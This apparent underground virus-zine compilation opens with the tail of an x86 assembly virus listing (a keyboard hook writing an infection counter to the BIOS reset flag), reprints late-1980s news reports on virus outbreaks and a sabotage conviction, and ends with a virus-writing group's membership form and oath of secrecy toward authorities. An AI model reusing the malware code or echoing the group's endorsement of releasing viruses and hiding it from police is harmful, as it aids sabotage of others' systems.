;-----------------------------------------------------------------------;
; ALT-CTRL-I: COPY THE INFECTION COUNTER INTO THE BIOS RESET FLAG
;-----------------------------------------------------------------------;
N09_X1: MOV     [ALT_CTRL],BX           ;SAVE ALT & CTRL STATUS
;
        MOV     AX,[COUNTER_1]          ;PUT COUNTER_1 INTO RESET FLAG
        MOV     BX,0040H
        MOV     DS,BX
        MOV     [0072H],AX              ; 0040:0072 = RESET FLAG
        JMP     N09_90
;
;-----------------------------------------------------------------------;
; DELAY
;
; ON ENTRY AH:CX = LOOP COUNT
;-----------------------------------------------------------------------;
DELAY:  SUB     CX,CX
D_01:   LOOP    $
        SUB     AH,1
        JNZ     D_01
        RET
;
;-----------------------------------------------------------------------;
; DATA
;-----------------------------------------------------------------------;
A7DF4   DB      27H,00H,8,2
COUNTER_1 DW    001CH
ALT_CTRL  DW    0
A7DFC   DB      27H,0,8,2

[2.10] Virili In The News
------------------

This section deals with a large amount of stuff, basically a bunch of viruses and other things that have been in the newspapers and magazines because of all the damage they have done. Enjoy....

There's A Virus In My Software
Mischief-makers at the computer are deliberately endangering data
By Philip J. Hilts, Washington Post Staff Writer
The Washington Post Weekly Edition, Page 38, May 23-29, 1988.

Tiny programs that deliberately cause mischief are epidemic among computers and causing nervousness among those who monitor them. Since the first tests in 1983 of the notion that machines can catch and spread "information diseases," the computer world has reached the point at which as many as thirty instances of "computer virus" have been reported in the past year, affecting tens of thousands of U.S. computers alone.
Such viruses have been found at the National Aeronautics and Space Administration, International Business Machines Corporation, the House of Representatives, at least six universities, several major computer networks such as CompuServe and several businesses, including the world's largest computer-service company, the $4.4 billion Electronic Data Systems Corporation of Dallas, Texas.

Written by malicious programmers, the viruses are sneaked into computer systems by piggybacking them on legitimate programs and messages. There, they may be passed along or instructed to wait until a prearranged moment to burst forth and destroy data.

Hundreds of computers at the Hebrew University of Jerusalem and other places in Israel were hit last fall by a virus designed to spread and then, in one swipe on a Friday the thirteenth, destroy all data in any computer it could reach. If not for an error by its author, who has not been caught, the virus could have caused devastation among micro-computers in Israel and other nations. The virus did not check to see whether it already had infected a program and so infected some computers hundreds of times, crowding their memories enough to call attention to itself.

In a seven-month campaign, programmers in Israel hastened to find infected machines and ensure that the smallest number would be affected before Friday, May 13th. Officials say they initially thought that the infection was connected with the anniversary of the last day that Palestine existed as a political entity but subsequently decided that it most likely involved just Friday the thirteenth. Apparently the campaign was successful; there has been no word of substantial damage. This past Friday the thirteenth is this year's only such day.

At the Aldus Corporation of Seattle, Washington, a major software maker, executives are huddling with lawyers to try to determine whether international spread of such diseases is illegal. No virus cases have been taken to court.

At N.A.S.A. headquarters in Washington, several hundred computers had to be resuscitated after being infected. N.A.S.A. officials have taken precautions and reminded their machines' users to follow routine computer hygiene: Don't trust foreign data or strange machines.

Viruses have the eerie ability to perch disguised among legitimate data just as biological viruses hide among genes in human cells, then spring out unexpectedly, multiplying and causing damage. Experts say that even when they try to study viruses in controlled conditions, the programs can get out of control and erase everything in a computer. The viruses can be virtually impossible to stop if their creators are determined enough.

"The only way to protect everybody from them is to do something much worse than the viruses: Stop talking to one another with computers," says William H. Murray, an information-security specialist at Ernst and Whinney financial consultants in Hartford, Connecticut.

Hundreds of programs and files have been destroyed by viruses, and thousands of hours of repair or prevention time have been logged. Programmers have quickly produced antidote programs with such titles as "Vaccine," "Flu Shot," "Data Physician" and "Syringe." Experts say known damage is minimal compared with the huge destructive potential. They express the hope that the attacks will persuade computer users to minimize access to programming and data.

"What we are dealing with here is the fabric of trust in society," says Murray. "With computer viruses, we have a big vulnerability."

Early this year, Aldus Corporation discovered that a virus had been introduced that infected at least five thousand copies of a new drawing program called Freehand for the Macintosh computer. The infected copies were packaged, sent to stores and sold.
On March 2, the virus interrupted users by flashing this message on their screens: "Richard Brandow, publisher of MacMag, and its entire staff would like to take this opportunity to convey their universal message of peace to all Macintosh users around the world."

Viruses are the newest of evolving methods of computer mayhem, says Donn B. Parker, a consultant at SRI International, a computer research firm in Menlo Park, California. One is the "Trojan horse," a program that looks and acts like a normal program but contains hidden commands that eventually take effect, ordering mischief. Others include the "time bomb," which explodes at a set time, and the "logic bomb," which goes off when the computer arrives at a certain result during normal computation. The "salami attack" executes barely noticeable small acts, such as shaving a penny from thousands of accounts.

The computer virus has the capability to command the computer to make copies of the virus and spread them. A virus typically is written as only a few hundred characters in a program containing tens of thousands of characters. When the computer reads legitimate instructions, it encounters the virus, which instructs the computer to suspend normal operations for a fraction of a second. During that time, the virus instructs the computer to check for other copies of itself and, if none is found, to make and hide copies. Instructions to commit damage may be included.

A few infamous viruses found in the past year include:

[] The "Scores" virus. Named after a file it spawns, it recently entered several hundred Macintosh computers at N.A.S.A. headquarters. "It looks as if it's searching for a particular Macintosh program with a name that no one recognizes," spokesman Charles Redmond says. This virus, still spreading, has reached computers in Congress' information system, at the National Oceanic and Atmospheric Administration and at Apple Computer Incorporated's government-systems office in Reston, Virginia. It has hit individuals, businesses and computer "bulletin boards" where computer hobbyists share information. It apparently originated in Dallas, Texas and has caused damage, but seemingly only because of its clumsiness, not an instruction to do damage.

[] The "Brain" virus. Named by its authors, it was written by two brothers in a computer store in Lahore, Pakistan, who put their names, address and phone number in the virus. Like "Scores," it has caused damage inadvertently, ordering the computer to copy itself into space that already contains information.

[] The "Christmas" virus. It struck last December after a West German student sent friends a Christmas message through a local computer network. The virus told the receiver's computer to display the greeting, then secretly send the virus and message to everyone on the recipient's regular electronic mailing list. The student apparently had no idea that someone on the list had special, restricted access to a major world-wide network of several thousand computers run by I.B.M. The network broke down within hours when the message began multiplying, stuffing the computers' memories. No permanent damage was done, and I.B.M. says it has made repetition impossible.

Demonstrations have shown that viruses can invade the screens of users with the highest security classification, according to Fred Cohen of Cincinnati, a researcher who coined the term "computer virus." A standard computer-protection device at intelligence agencies, he says, denies a person at one security level access to the files of anyone at a higher level, and allows reading but denies writing of the files of anyone lower. This, however, "allows the least trusted user to write a program that can be used by everyone" and is "very dangerous," he says. Computers "are all at risk," says Cohen, "and will continue to be... not just from computer viruses. But the viruses represent a new level of threat because of their subtleness and persistence."

1.) Computer "viruses" are actually immature computer programs. Most are written by malicious programmers intent on destroying information in computers for fun.

2.) Those who write virus programs often conceal them on floppy disks that are inserted in the computer. The disks contain all programs needed to run the machine, such as word processing programs, drawing programs or spreadsheet programs.

3.) A malicious programmer makes the disk available to others, saying it contains a useful program or game. These programs can be lent to others or put onto computerized "bulletin boards" where anyone can copy them for personal use.

4.) A computer receiving the programs will "read" the disk and the tiny virus program at the same time. The virus may then order the computer to do a number of things:
    A.) Tell it to read the virus and follow instructions.
    B.) Tell it to make a copy of the virus and place it on any disk inserted in the machine that day.
    C.) Tell it to check the computer's clock, and on a certain date destroy the information that tells it where data is stored on any disk: if an operator has no way of retrieving information, it is destroyed.
    D.) Tell it not to list the virus programs when the computer is asked for an index of programs.

5.) In this way, the computer will copy the virus onto many disks, perhaps all or nearly all the disks used in the infected machine. The virus may also be passed over the telephone, when one computer sends or receives data from another.

6.) Ultimately hundreds or thousands of people may have infected disks and potential time bombs in their systems.
-----------------------------------------------
'Virus' infected hospital computers, led to epidemic of software mix-ups
-----------------------------------------------
From the San Diego Tribune, March 23, 1989

BOSTON (UPI) -- A "virus" infected computers at three Michigan hospitals last fall and disrupted patient diagnoses at two of the centers in what appears to be the first such invasion of a medical computer, it was reported yesterday.

The infiltration did not harm any patients but delayed diagnoses by shutting down computers, creating files of non-existent patients and garbling names on patient records, which could have caused more serious problems, a doctor said.

"It definitely did affect care in delaying things and it could have affected care in terms of losing this information completely," said Dr. Jack Juni, a staff physician at the William Beaumont Hospitals in Troy and Royal Oak, Mich., two of the hospitals involved.

If patient information had been lost, the virus could have forced doctors to repeat tests that involve exposing patients to radiation, Juni said yesterday. The phony and garbled files could have caused a mix-up in patient diagnosis, he said.

"This was information we were using to base diagnoses on," said Juni, who reported the case in a letter in The New England Journal of Medicine. "We were lucky and caught it in time."

A computer virus is a set of instructions designed to reproduce and spread from computer to computer. Some viruses do damage in the process, such as destroying files or overloading computers.

Paul Pomes, a computer virus expert at the University of Illinois in Champaign, said this was the first case he had heard of in which a virus had disrupted a computer used for patient care or diagnosis in a hospital. Such disruptions could become more common as personal computers are used more widely in hospitals, Juni and Pomes said. More people know how to program -- and therefore sabotage -- personal computers than the more specialized computers that previously have been used, Pomes said.

The problem in Michigan surfaced when a computer used to display images for diagnosing cancer and other diseases began to malfunction at the 250-bed Troy hospital in August 1988. In October, Juni discovered a virus in the computer in the Troy hospital. The next day, Juni found the same virus in a similar computer in the 1,200-bed Royal Oak facility, he said.

The virus apparently arrived in a program on a storage disk that was part of the Troy computer system, he said. It probably was spread inadvertently to the Royal Oak computer on a floppy disk used by a resident who worked at both hospitals to write a research paper, he said. The virus also spread to the desk-top computers at the University of Michigan Medical Center in Ann Arbor, where it was discovered before it caused problems.

"Prosecutor Wins Conviction In Computer Data Destruction"
September 21, 1988

Fort Worth, Texas (AP) - A former programmer has been convicted of planting a computer "virus" in his employer's system that wiped out 168,000 records and was activated like a time bomb, doing its damage two days after he was fired.

Tarrant County Assistant District Attorney Davis McCown said he believes he is the first prosecutor in the country to have someone convicted for destroying computer records using a "virus."

"We've had people stealing through computers, but not this type of case," McCown said. "The basis for this offense is deletion."

"It's very rare that the people who spread the viruses are caught," said John McAfee, chairman of the Computer Virus Industry Association in Santa Clara, which helps educate the public about viruses and find ways to fight them. "This is absolutely the first time" for a conviction, McAfee said.

"In the past, prosecutors have stayed away from this kind of case because they're too hard to prove," McCown said yesterday. "They have also been reluctant because the victim doesn't want to let anyone know there has been a breach of security."

Donald Gene Burleson, 40, was convicted of charges of harmful access to a computer, a third-degree felony that carries up to 10 years in prison and up to $5,000 in fines.

A key to the case was the fact that State District Judge John Bradshaw allowed the computer program that deleted the files to be introduced as evidence, McCown said. It would have been difficult to get a conviction otherwise, he said. The District Court jury deliberated six hours before bringing back the first conviction under the state's 3-year-old computer sabotage law.

Burleson planted the virus in revenge for his firing from an insurance company, McCown said. Jurors were told during a technical and sometimes-complicated three-week trial that Burleson planted a rogue program in the computer system used to store records at USPA and IRA Co., a Fort Worth-based insurance and brokerage firm.

A virus is a computer program, often hidden in apparently normal computer software, that instructs the computer to change or destroy information at a given time or after a certain sequence of commands.

The virus, McCown said, was activated Sept. 21, 1985, two days after Burleson was fired as a computer programmer because of alleged personality conflicts with other employees. "There were a series of programs built into the system as early as Labor Day (1985)," McCown said. "Once he got fired, those programs went off."

The virus was discovered two days later, after it had eliminated 168,000 payroll records, holding up company paychecks for more than a month. The virus could have caused hundreds of thousands of dollars in damage to the system had it continued, McCown said.
WEST COAST CORRUPTED ALLEGIANCE PRESENTS: -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- >> CORRUPTED PROGRAMMING INTERNATIONAL << >> MEMBERSHIP APPLICATION << -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- (CPI is a sub-group of WCCA) NOTE: The following information is of a totally confidential nature. We must question you in depth and thouroughly so that our knowledge and idea of you will be quite complete. Remember, it is the fate of our voting members who will decide upon your membership, as the result of your response to this questionarre. Please answer the following completely and to the best of your ability. Also note that we may decide to voice validate you or gather any other information through other sources and will discover if you have placed false or misleading information on this application. PERSONAL INFORMATION: ----------------------------------------------------------------------------- Alias(es) You HAVE Used : Alias(es) You Currently Use : Your FULL REAL Name : Your Voice Phone Number :(###)###-#### Your Data Phone Number :(###)###-#### Your Mailing Address : Your City, State & Zip : Your Age : Occupation/Grade : Place of Employment/School : Work Phone Number : Your Interests And Hobbies : Are You IN ANY WAY Affiliated With ANY Governmental/Law Enforcement Agency? If So, In What Way? (Such as FBI/Sheriff/Police/etc. YOU KNOW WHAT I MEAN) : : Are You IN ANY WAY Affiliated With The Telephone Company Or Any Type Of Phone, Data, Or Long Distance Type Of Company? If So, In What Way? 
: : COMPUTER INFORMATION/EXPERIENCE ----------------------------------------------------------------------------- Computer Experience (time) : Modeming Experience (time) : BBS's You Frequent (Name/#) : Some Elite References : Computers You Have Used : Computer(s) You Are Using : Computer You Prefer : Languages You Have Tried : Languages You Know Well : Your Best Language : Have You Ever Phreaked : Do You Phreak Regularly : Have You Ever Hacked : Do You Hack Regularly : Have You Ever Cracked : Do You Crack Regularly : Ever Made A Virus/Trojan : Major Accomplishments : : INTERVIEW ----------------------------------------------------------------------------- Answer In 4 Lines Or Less: What do you think Corrupted Programming International is? : : : : When did you first hear about CPI? : : : : Why do you want to be a member of CPI? : : : : Do you know any of the members of CPI? Can you name any or the founders of CPI? : : : : Have you considered the distribuition of Viruses/Trojans as a "crime"? Why or why not? Have you ever considered the consequences that could result from the acts of releasing a Virus/Trojan? (morally speaking?) : : : : Have you written any text files? (On any underground type of subject) : : : : Are you a member of any other group(s)? Can you name them and their HQ BBS? : : : : What would you consider yourself if you were admitted into CPI, a programmer, a phreaker, a distributor, a information gatherer, or a vegetable? : : : : Why would you ever want to release or aid in releasing a potential virus/trojan to the public? : : : : Can you contribute to CPI? How? :(do you have access to info concerning virus/trojans) :(exceptional programmer?) :(got connections?) :(anything extraordinary?) OATH ----------------------------------------------------------------------------- Typing your name at the bottom of the following paragraph is the same as signing your name on an official document. 
authorities - As stated in the document below, the term authorities shall be defined as any law enforcement agency or any agency that is/may be affiliated with any law enforcement agency. Also, this includes any company or agency or person which is/may be involved with the telephone company or any telephone-type of service(s). I [your name here] do solemnly swear never to report neither to my peers nor the authorities the actions and duties performed by this group, Corrupted Programming International, on any account. Also, I realize that if I leave CPI and am no longer a member of CPI, it is my duty, as signed below, to uphold the greatest confidence of CPI's activities, and I agree that any information I may report to any one or any thing CANNOT be used against CPI and its members in a court of law. I fully understand that if I were to become affiliated with the authorities that it would be my duty to remove myself from any membership if my position presented itself as contradictory towards the group, CPI and its members. I also comprehend that if I were to be confronted by the authorities, it my duty as a CPI member, as signed below, is to never disclose or discuss CPI's activities to them; however, if I do, I fully agree that the information disclosed or discussed cannot then be used against CPI or any member(s) of CPI in a court of law. I further agree that all the terms and restrictions as noted above also correspond to the entire group of WCCA, West Coast Corrupted Allegiance. Typed:____________________ ----------------------------------------------------------------------------- .Answer Each Question To The Best And Fullest Of Your Ability. ----------------------------------------------------------------------------- Upload ALL Applications To The WCCA Headquarters BBS T H E A N D R O M E D A S T R A I N Future WCCA Support BBS's Will Be Active - Applications May Be Turned In Then